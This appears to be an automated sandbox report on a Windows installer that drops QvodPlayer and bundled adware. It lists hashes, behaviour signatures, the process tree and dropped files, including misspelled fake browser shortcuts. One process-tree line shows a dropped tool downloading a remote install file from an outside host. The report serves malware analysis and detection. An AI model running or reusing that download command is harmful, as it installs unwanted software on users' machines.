Analysis

  • max time kernel
    120s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-11-2024 23:39

General

  • Target

    613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe

  • Size

    4.5MB

  • MD5

    3f2a7d832c6664b9a261c35750e5a320

  • SHA1

    458a4eaebfce321135cb7ae13d642a8251648543

  • SHA256

    613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7

  • SHA512

    be5c370f49923763faca5f8e6e8916245060803eb2d9b29005e1b1f0b21caa9ee57cd74b6bc0e305f657530a5e3311148b3a767750d66252b3600c6915c0b4a8

  • SSDEEP

    98304:6HBGxaeNoUAT49fZw2mZkfCR/4+CBtOyBOeVFA2VQXf:cB0am2THZkfk/2B5RV+f

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 29 IoCs
  • Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 62 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe
    "C:\Users\Admin\AppData\Local\Temp\613e2610f5d51ecd11ee5ff5d1ed32b331af678e4e5e64f2b2a544787a97cea7N.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Program Files (x86)\QvodPlayer\kuaibo.exe
      "C:\Program Files (x86)\QvodPlayer\kuaibo.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Modifies Internet Explorer start page
      • Modifies registry class
      PID:1428
    • C:\Program Files (x86)\QvodPlayer\qvodupdate.exe
      "C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Installs/modifies Browser Helper Object
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4632
    • C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe
      "C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Program Files (x86)\tools\BaiduP2PService.exe
        "C:\Program Files (x86)\tools\BaiduP2PService.exe" init
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:452
      • C:\Program Files (x86)\tools\sr.exe
        "C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1712
      • C:\Program Files (x86)\tools\BaiduP2PService.exe
        "C:\Program Files (x86)\tools\BaiduP2PService.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\QvodPlayer\NetUtil.dll

    Filesize

    134KB

    MD5

    f35c3050cf7db1095c50b788f2a8fca8

    SHA1

    2279c47413f9ea033eb12a275f56104c9c4cdf72

    SHA256

    df2fdefb72a3c8c346726c9e2788d8e84cfff44652abf235d86e8e2a618058f4

    SHA512

    7e6a9298903c3a94bca054e8333fc27cc588f4ffe493f42f98486888b297a265f9cd9dde38c592ca953ee64bbe364e7f6da64aaae231b43aca05055ae597f05d

  • C:\Program Files (x86)\QvodPlayer\PlayCtrl.dll

    Filesize

    163KB

    MD5

    4907451bf7537380a4b0fac6b73d7ebd

    SHA1

    2d0fe6b1909a7aa4f872bbeb1fe7d0f52e655f59

    SHA256

    9c3934025f4711ac3c1c49e7777505fca44ad750b69b714eca4a274b9287c9a2

    SHA512

    2e054c08926c91ee4bac9ac7366a0ab1c184a98d9ac64ea14744e8d37e26672dc4ec20abaa788856ff5002dc543cc78d9c090ba05de18ca262ec19b3e6e33a83

  • C:\Program Files (x86)\QvodPlayer\QvodStatistic.dll

    Filesize

    112KB

    MD5

    bd4a461f7acb661d1bda3e9dc0b2175c

    SHA1

    3b4d5eb452d0d65a0c534c8411f2db8ffd3503df

    SHA256

    bfde8938d04dba3027f448082c04e544f244f622282e3acd3f65fadb060e2eda

    SHA512

    3e48cdc1a88701b4c9d6b78439064b56a113cbaef17310d155b17740396be5414cf17efdf8bd422b99bbfedaf079e608cf7ad263ae2c904ab1986da24a12a987

  • C:\Program Files (x86)\QvodPlayer\kuaibo.exe

    Filesize

    3.2MB

    MD5

    f31f3458c48c12fa3d162a0bd2cbe15c

    SHA1

    54b652afd8dc0ebbe28efa9fd0f7c307c649c800

    SHA256

    6aa930e3e237db31ebd8df64e839767c3b21a9d310a941e4f6f2cb1fafd98210

    SHA512

    91f0642b9f08337237ee127cb0488fd21716b5c3bea649c8668cc52de2f4903fc154f38d7f8121dab4ff312da40a80a370f9115d86f828d2000ac27f765955e7

  • C:\Program Files (x86)\QvodPlayer\npQvodInsert.dll

    Filesize

    661KB

    MD5

    0a6324504898ad0410efd545c9751399

    SHA1

    ba5c1251dd11f9f1df1536fed808c907fa796043

    SHA256

    cec6ed44920f1ec1b092d2c7f0114f043092c734b26c964611e138e43fe57889

    SHA512

    a9e61904af3cb8e36ea9b739f62218857a521a197eb7078af4fb3f4c570f0c5c706de1e27a2206ce949e5a70ee4e4e9ba2a5b9859be6a424e65610a1b02725bd

  • C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe

    Filesize

    737KB

    MD5

    70105bc3ddcf9dffa3b47cc3f1e6ad6a

    SHA1

    d531771f6a927f9be824ebdff21cc8545f5172aa

    SHA256

    086da25438d3a85f533a5d982086216e0f17774030aec5d1a5efda10207d1f11

    SHA512

    79eb7ce814d2c238538d0101681a59613301b2bbeee8d59db31f342fc408d0613278607d003f9241178ae0b35a8dbdde2a299ef76fb502e9edb367ac0cbb3f4c

  • C:\Program Files (x86)\QvodPlayer\qvodupdate.exe

    Filesize

    361KB

    MD5

    45f4ac3edd1eb1163e799405af06d72c

    SHA1

    d542663c99e67541af90c25f8d1349bb1c4cfbf3

    SHA256

    5729d4ac29b8b36c9d7eefd553a584fd25ada253cdf1ca9e471d80de2a3f7c8b

    SHA512

    58857ad1260157b4861ea940de9ee322a5a369fb0c0b0a7fb072806cde06c7bb17dc5a415505cb96685f1dffae49d148e032b36c3fd94b78afa5b8bd0562ac06

  • C:\Program Files (x86)\QvodPlayer\tools.exe

    Filesize

    84KB

    MD5

    e3468ff5b750ad47812ad274a861a70e

    SHA1

    6fb52df5cc44e2e831526e852dd62ea907e9627f

    SHA256

    46460637b57539bd495a4c3f5709df1e277067baf3a54b55d5ad8f19a1a4a15a

    SHA512

    ce43c8e7ddb5fc7e323ecfb12a90fc143e2f2d6d5ceec1514adde901c6dcb9d993952a753c740e0a4942f0d0881c9e5802870056a9099e167c38bbb2952208a8

  • C:\Program Files (x86)\tools\BaiduP2PService.exe

    Filesize

    508KB

    MD5

    012a8879efa6f8dbc3c6ba58a659fefb

    SHA1

    d2a2dac321ff5a78de52e926044ba362f4004cde

    SHA256

    774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66

    SHA512

    b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba

  • C:\Program Files (x86)\tools\P2PBase.dll

    Filesize

    496KB

    MD5

    a86a90ba120c455ac0e3655f146d5a0f

    SHA1

    277c55191fbbadf888626df4fba279591632a406

    SHA256

    577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43

    SHA512

    a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47

  • C:\Program Files (x86)\tools\P2PStatReport.dll

    Filesize

    364KB

    MD5

    3b14cae0ea1d045bb5b196017913edb3

    SHA1

    7ca456595148f2d5e71444a612f2351c4cd8a20d

    SHA256

    a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982

    SHA512

    6c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200

  • C:\Program Files (x86)\tools\P2SBase.dll

    Filesize

    512KB

    MD5

    894ab861e608eacbac24280ab234368f

    SHA1

    e283ef8757f04b0252ec5dce22e6e8094bed7737

    SHA256

    687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb

    SHA512

    26a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3

  • C:\Program Files (x86)\tools\sr.exe

    Filesize

    154KB

    MD5

    83bcf3ad82ce65d2bd0fdd364fe32cb5

    SHA1

    32c5080bbf51dd22bed7f594a92f753a25eef73c

    SHA256

    5635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d

    SHA512

    852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81

  • C:\ProgramData\tools\daohang_.ico

    Filesize

    16KB

    MD5

    043d3e9f869842479b601595c7b2ee3f

    SHA1

    9db5a70043a18bd12f3dbd50276a4b3ce7ffec8a

    SHA256

    1f6374df8edb459d34367412105e0c2cdc9983a710de6468613e51bdaf91ce87

    SHA512

    76f273904ca1db7ef1c5a07824672e0fbe758631d154e917c3e7db80934ad26291c0b09b1a9ed2eea1a580c2891c2fb1c2ed92747432916fa168082846b0a2dc

  • C:\ProgramData\tools\sougou_search.ico

    Filesize

    17KB

    MD5

    d9f97bbefebd7f6680a5cd7e428e7c6e

    SHA1

    b8f27fd1cecd21a0d893cd6c4d2900fcf5e657a9

    SHA256

    bb445582d1ea6728c3ef6836d0523b3d36b36f3ebc1206cdfcde1ef92493f506

    SHA512

    5808b085bdb028dae82434b255a0b1da3391409942899ecd4a7a01734e617f5e11a28d56e01d82aace80e5e37f395f43113cc8e96b532726388818f3c41d7f5d

  • C:\ProgramData\tools\taobao.ico

    Filesize

    16KB

    MD5

    c0b1b8ce980ec9a0a71d5f180790791a

    SHA1

    390c1b7bd831828f99643f1a9853403e373d3fa1

    SHA256

    c8fc4c41570d4bcff7121ae3c38af9ef315b5f009d98095a7623ce60f254564e

    SHA512

    5c299915738965defa3fff3c9b5b3b047995add307f6c34572ec4818e9b14b410e708e27dd6100257f893d37c54f003fc7ac52479193283542245ce715de8b1f

  • C:\Users\Admin\AppData\LocalLow\Baidu\BaiduPlayer\P2PCfg.ini

    Filesize

    189B

    MD5

    18808dab03c58cf3776433e9652a6d17

    SHA1

    73fcd0262dd6ae92699b29ff3a48b6487bfea3c4

    SHA256

    800a289fe7b161f63da4b2129d3769f3019d4a30c63756785a5d9383d7d5ecc0

    SHA512

    1deea0cc3230fffb52d7d132f9d59aa3cb15278a10dd4a39397fa8ff3f8ff87f505d7f022edd2003f019802c49be0ec8a4c308f1b131dba58bd1380faac2f00e

  • C:\Users\Admin\AppData\Local\Temp\nsc8C44.tmp\nsTools.dll

    Filesize

    260KB

    MD5

    6ae9eaa868bcb42ae79bf9701b18e7ec

    SHA1

    80bd26a403aaee21fc2b9af0d5585a768ea3acd0

    SHA256

    d4fb435c03841d4911cba57bd01212156d4a0ab4554e5a25b3604e43b3622fb5

    SHA512

    06c60bb27b39064c237e52d3ccea2371953fc454321eab2046ffcb5cc9771206accb0124fdf1726d5cf821906ee05e03dc7ae9ca2534f6543e585382a9c0a688

  • C:\Users\Admin\AppData\Local\Temp\nsg638E.tmp\System.dll

    Filesize

    11KB

    MD5

    959ea64598b9a3e494c00e8fa793be7e

    SHA1

    40f284a3b92c2f04b1038def79579d4b3d066ee0

    SHA256

    03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b

    SHA512

    5e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64

  • C:\Users\Admin\AppData\Local\Temp\nsk9230.tmp\nsTools.dll

    Filesize

    262KB

    MD5

    69fcb9ae215b1397ae1f9751da7016d0

    SHA1

    da3816591f15fcdae48910fb632ee5d2f8c09d4d

    SHA256

    ba5b2e57997aae2ce636a76e8ffc536498bf3882d61648f30c169cc17fd1f342

    SHA512

    f9c6aa7b420b1e18ab7e7351f4d228e5b2fd047fc70e170b037efda0bca4b5ff146f6457f477aeaecf829e42d3c730530483c240e0b1de98aef217c2bcc56689

  • C:\Users\Admin\AppData\Local\Temp\nsm6534.tmp\InstallOptions.dll

    Filesize

    15KB

    MD5

    67d8f4d5acdb722e9cb7a99570b3ded1

    SHA1

    f4a729ba77332325ea4dbdeea98b579f501fd26f

    SHA256

    fa8de036b1d9bb06be383a82041966c73473fc8382d041fb5c1758f991afeae7

    SHA512

    03999cc26a76b0de6f7e4e8a45137ee4d9c250366ac5a458110f00f7962158311eea5f22d3ee4f32f85aa6969eb143bdb8f03ca989568764ed2bc488c89b4b7f

  • C:\Users\Admin\AppData\Local\Temp\nsm6534.tmp\ioSpecial.ini

    Filesize

    784B

    MD5

    8669433913638dbc656fcd476ad33538

    SHA1

    773304c8cdbd9613a3844e60c63db0ad5f1bfb93

    SHA256

    5ef14f56c53e7739bb6061d63569925080f504b5a480fc54cb149258e047be90

    SHA512

    32d661c94b409db58c5001a0a1de6c2cb354095d3c69e442bf286741ac23ba8f9c2d1bf43da22f28b7f54bc64707a0e25510fa8403b12363cfdc3be9ce3b6810

  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Intrenet. Expleror.lnk

    Filesize

    1003B

    MD5

    6ca211ef124382fa13766df896b4820c

    SHA1

    cfdaf8776f231cbae1c64abf324593eea32515a6

    SHA256

    1f7920cb1cd740f5bc4748d334bcfd0d8eb14189a82191a511374513fa11a1e8

    SHA512

    5280c2f4f89ef9b0742f55f2877cdbe45215a79e89bbd63a963389fe0215eed5b2240928cad03b4652fd2c7a5e98e13d4e364b8fc8608b6f3a76f27816c713b9

  • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozlila Friefox.lnk

    Filesize

    992B

    MD5

    76b490d8285d7b06072639e9a75692ac

    SHA1

    f2a6a4e57f0142d1fce01d9c155d27d5a3e64444

    SHA256

    131645b4f8ead7c4cf816fae2149d2e226e4910f41d87482dbca018ae21d1603

    SHA512

    7a345c44a324c8240d19d9556c8a429400e8dd4afdcddc7dbec05d0c923b7bbaff8554945fb9e1f3b7cea852ed85e3df034f6cb16d0cf96b25d8a3b26962e5ce

  • C:\Users\Admin\Desktop\Intrenet. Expleror.lnk

    Filesize

    979B

    MD5

    fd3ccddfaaf77c19167b3ebeb4097f5d

    SHA1

    ce32a79abea9589dce0ad5730010d98dba4107ad

    SHA256

    17a68dcfac2c8f61cfec3842b00ce3ea9e231c1836559e1fe08d73133ccce9ae

    SHA512

    e818e7b0fa87ea092cb040f81da32a07e859f5caeef94c7103453fa90391ccc9ded7ed47973758581e6bed8afd6fd0d0c68825bb766255ac36c0aa725c82c3d0

  • memory/452-173-0x0000000000AD0000-0x0000000000B54000-memory.dmp

    Filesize

    528KB

  • memory/452-170-0x0000000000640000-0x000000000069D000-memory.dmp

    Filesize

    372KB

  • memory/1428-258-0x0000000008B70000-0x0000000008C19000-memory.dmp

    Filesize

    676KB

  • memory/1428-280-0x0000000008C70000-0x0000000008C92000-memory.dmp

    Filesize

    136KB

  • memory/1428-269-0x0000000008C30000-0x0000000008C59000-memory.dmp

    Filesize

    164KB

  • memory/1428-274-0x0000000008CA0000-0x0000000008CC0000-memory.dmp

    Filesize

    128KB

  • memory/1960-201-0x0000000000AF0000-0x0000000000B74000-memory.dmp

    Filesize

    528KB

  • memory/1960-198-0x0000000000950000-0x00000000009AD000-memory.dmp

    Filesize

    372KB

  • memory/2144-149-0x0000000000400000-0x000000000052A000-memory.dmp

    Filesize

    1.2MB

  • memory/2144-29-0x0000000000400000-0x000000000052A000-memory.dmp

    Filesize

    1.2MB

  • memory/2144-0-0x0000000000400000-0x000000000052A000-memory.dmp

    Filesize

    1.2MB

  • memory/2432-183-0x0000000006800000-0x0000000006848000-memory.dmp

    Filesize

    288KB

  • memory/4632-43-0x00000000021F0000-0x0000000002236000-memory.dmp

    Filesize

    280KB